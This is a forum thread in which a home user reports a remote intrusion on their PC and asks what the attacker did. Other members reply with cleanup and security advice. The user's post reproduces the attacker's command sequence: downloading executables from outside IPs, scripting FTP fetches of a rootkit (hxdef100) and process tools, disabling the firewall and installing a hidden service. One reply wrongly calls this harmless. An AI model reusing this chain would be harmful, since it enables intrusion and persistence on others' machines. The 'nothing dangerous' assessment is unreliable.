Use HiJackThis to track down or check for possible infections. Here is all the the info needed to empower yourself, anything you are not sure of, put into a search engine like Google. Read this link 1st, it has step by step. http://www.wilderssecurity.com/show... Important: Create a specific folder on your hard drive called HijackThis to keep its backups. You can do this by going to My Computer (Windows key+e) then double click on C: then right click and select New then Folder and name it HijackThis. Download and unzip HijackThis.exe into this folder. http://www.merijn.org/downloads.html Or, http://tomcoyote.com/hjt/ Or, http://www.spywareinfo.com/~merijn/... If possible run HJT in Normal mode ( not Safe ) with all your normal startup's working. HijackThis Tutorial - How to Analyse your own log. http://spywarewarrior.com/viewtopic... http://hometown.aol.co.uk/jrmc137/h... http://www.bleepingcomputer.com/tut... http://www.malwarehelp.org/understa... HijackThis log file analysis ( online ) http://hijackthis.de/index.php?lang... Or, http://startup.networktechs.com/pag... http://hjt.iamnotageek.com Malware Prevention: Prevent Re-infection http://wiki.castlecops.com/Malware_...

0

Ever hear of TightVNC? This is what is to be used via internet. Though Jennifer gave you the best advice. Only via vpn. Don't waste your lifespan on hijack this or trying to discover who the intruder was. You left the barn door open. You just paid someone to give you a fantastic lesson on network and pc security. Be glad. You should sign up for a credit card watch and put a hold on any major changes dealing with your bank cards/bank accounts. If you have used your pc to order stuff online or do online banking there may be records of these transactions the hacker got. Give a person a fish, they eat for a day. Suggest they internet search and they learn a skill for a lifetime.

0

>>>would any body be ABLE to check what they did and also, tell me IF YOU COULD FIND OUT WHO THEY ARE, what you can do to them?<<< Unless you have: 1. A specific IP address 2. Exact time of day and 3. Length of time they had access to your machine to "hack" you No... (and that's not taking into account that whether you were really hacked and an IP address was spoofed)

0

I got all that... this is what they did: installed something from this website: the-bling.com/hummm.exe installed 76.173.251.129:81/csrss.exe run/ cmd c:\echo open 217.91.29.10 21 >> c:\ftp.txt c:\echo user anonymous >> c:\ftp.txt c:\echo blank >> c:\ftp.txt c:\echo type binary >> c:\ftp.txt c:\echo get DDSXP.bat >> c:\ftp.txt c:\echo quit >> c:\ftp.txt c:\ftp.exe -i -n -v -s:c:\ftp.txt ftp>open 217.91.29.10 21 ftp>user anonymous ftp>type binary ftp>get DDSXP.bat ftp>quit c:\ then on windows firewall he unbloked "File Transfer Program" then he disable "windows firewall" runned DDSXP.bat on cmd c:\DDSXP.bat ftp>217.91.29.10 21 ftp>user anonymous ftp>type binary ftp>get regsvc.exe ftp>get wmipjobj.mof ftp>get signon.txt ftp>get ServiceDaemon.exe ftp>get ssh.exe ftp>get Fport.exe ftp>get dirchange.txt ftp>get pslist.exe ftp>get pskill.exe ftp>get hxdef100.ini ftp>get hxdef100.exe ftp>quit c:\ all those file were stored in a hidden folder named "here", placed at: c:\windows\java\classes\here then he typed c:\regsvc /I registry services started successfully c:\hxdef100.exe run: www.digitalabs.gr/preview/temp/test/winrar.exe (douwloaded and installed) then www.sendspace.com/file/9mys0e downloaded (re.rar) then www.rarlab.com downloaded and installed WinRAR 3.70 beta 5 (wrar37b5.exe) on windows he extracted these files from re.rar dhcpcl.exe wrt.acx copied and pasted them in this directory c:\windows\java\trustlib\ then prompt: c:\windows\java\trustlib\dhcpcl.exe /i /h c:\windows\java\trustlib\net start dhcpcl.exe ----- well thats all they did, my best interest would be to get my hadns on this f.. people, but at the same time, i wanna share my bad experience so people can learn all the risks we have when we dont have protection. Please somebody tell me if these programs installed in my pc were dangerous, what were the porpouses, and how can they get my personal info now? thans a lot por your posts

0

Nothing dangerous, all the guy did was install some service, and disable your firewall, looks like the intent was to be able to continue connecting to your computer and use it for who knows what. If you are in anyway serious about catching the people that altered your computer you need to forget about the computing.net forum and contact your local police agency or local beurau of investigation. If you don't want to do that, then reformat your hard drive and chalk it up as a lesson learned.

0

I really appreciatte your help and comments, I found the ip adress and called the ISP provider, "Road Runner in VA" this is what they said: Hello, Road Runner is unable to release any information regarding subscriber accounts, including customer-identifying information (name, address, phone), or actions taken against a subscriber account (suspension, account termination, etc), without a proper subpoena or court order. You may address such documents to: Custodian of Records Road Runner HoldCo, LLC 13241 Woodland Park Rd Herndon, VA 20171 You may also fax your document to (703) 345-3607 - Attention: Custodian of Records. ---------- so that means I am screwed, this companies dont help at all, I also went to the police and they told me unless somebody stealed from you we can not open a report, I said, well they got into my personal property, they again said, If nothing has been stolen from you, there is nothing we can do. so once again nobody seems to care. Thank you guys you've been really helpfull

0